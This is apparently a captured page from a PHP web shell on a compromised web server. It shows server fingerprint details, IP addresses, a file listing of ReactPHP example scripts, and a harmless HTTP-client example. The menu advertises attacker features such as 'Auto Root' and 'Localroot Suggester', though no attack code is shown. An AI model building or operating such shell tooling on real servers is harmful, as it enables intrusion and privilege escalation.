Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.227.140.134
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
3 /
clue /
buzz-react /
examples /
Delete
Unzip
Name
Size
Permission
Date
Action
01-google.php
367
B
-rw-r--r--
2018-10-24 09:00
02-concurrent.php
708
B
-rw-r--r--
2018-10-24 09:00
03-any.php
918
B
-rw-r--r--
2018-10-24 09:00
11-http-proxy.php
972
B
-rw-r--r--
2018-10-24 09:00
12-socks-proxy.php
952
B
-rw-r--r--
2018-10-24 09:00
13-unix-domain-sockets.php
727
B
-rw-r--r--
2018-10-24 09:00
21-stream-forwarding.php
731
B
-rw-r--r--
2018-10-24 09:00
22-stream-stdin.php
597
B
-rw-r--r--
2018-10-24 09:00
91-stream-bandwidth.php
1.4
KB
-rw-r--r--
2018-10-24 09:00
Save
Rename
<?php use Clue\React\Buzz\Browser; use Psr\Http\Message\ResponseInterface; use React\Stream\WritableResourceStream; use RingCentral\Psr7; $url = isset($argv[1]) ? $argv[1] : 'http://google.com/'; require __DIR__ . '/../vendor/autoload.php'; $loop = React\EventLoop\Factory::create(); $client = new Browser($loop); $out = new WritableResourceStream(STDOUT, $loop); $info = new WritableResourceStream(STDERR, $loop); $info->write('Requesting ' . $url . '…' . PHP_EOL); $client->withOptions(array('streaming' => true))->get($url)->then(function (ResponseInterface $response) use ($info, $out) { $info->write('Received' . PHP_EOL . Psr7\str($response)); $response->getBody()->pipe($out); }, 'printf'); $loop->run();